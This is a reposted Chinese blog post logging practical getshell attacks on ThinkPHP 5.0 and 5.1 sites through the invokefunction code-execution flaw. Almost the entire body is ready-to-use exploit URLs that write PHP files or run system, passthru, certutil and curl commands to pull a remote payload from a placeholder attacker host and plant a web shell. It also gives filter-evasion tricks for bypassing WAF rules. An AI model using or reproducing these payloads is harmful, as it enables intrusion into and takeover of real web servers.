碼上快樂

相關內容    簡體    繁體

ThinkPHP5.x.x各版本實戰環境getshell

本文轉載自   查看原文   2019-11-03 11:47   454    代碼審計/ web/ 滲透測試

  1. #這個文章我之前在t00ls已經分享過了

  2. #內容只是對tp5的實戰環境下getshell做的記錄,中間遇到的一些小問題的突破,沒啥技術含量

-5.1.18

  1. http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index_bak2.php',file_get_contents('https://www.hack.com/xxx.js'));?>

-5.0.5

  1. wafeval進行了攔截

  2. 禁止了assert函數

  3. eval函數后面的括號進行了正則過濾

  4. file_get_contents函數后面的括號進行了正則過濾

  5.  

  6. http://www.xxxx.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>

-5.1.18

  1. 所有目錄都無寫權限,base64函數被攔截

  2.  

  3. http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_POST[1])

-5.0.18

  1. windows

  2. http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][0]=1

  3.  

  4. http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo()

  5.  

  6. 使用certutil

  7. http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=passthru&vars[1][0]=cmd /c certutil -urlcache -split -f https://www.hack.com/xxx.js uploads/1.php

  8. 由於根目錄沒寫權限,所以寫到uploads

-5.0.14

  1. eval'')和assert'')被攔截,命令函數被禁止

  2.  

  3. http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo();

  4.  

  5. http://www.xxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_GET[1])&1=call_user_func_array("file_put_contents",array("3.php",file_get_contents("https://www.hack.com/xxx.js")));

-5.0.11

  1. http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php

-5.0.14

  1. php7.2

  2. http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.txt&vars[1][1]=1

  3.  

  4. http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index111.php',file_get_contents('https://www.hack.com/xxx.js'));?>

  5. 寫進去發現轉義了尖括號

  6.  

  7. 通過copy函數

  8. http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]= https://www.hack.com/xxx.js&vars[1][1]=112233.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 thinkphp5.x全版本任意代碼執行getshell discuz!ml-3.x版本getshell ThinkPHP v5.x命令執行利用工具(可getshell) ThinkPHP v5.x命令執行利用工具(可getshell) [漏洞案例]thinkcmf 2.x從sql注入到getshell實戰 ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞 OpenCV各版本差異與演化,從1.x到4.0 Unity 4.x 各版本IOS IL2CPP對比 ThinkPHP 5.0.x、5.1.x、5.2.x 全版本遠程命令執行漏洞 寶塔面板6.x版本前台存儲XSS+后台CSRF組合拳Getshell
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM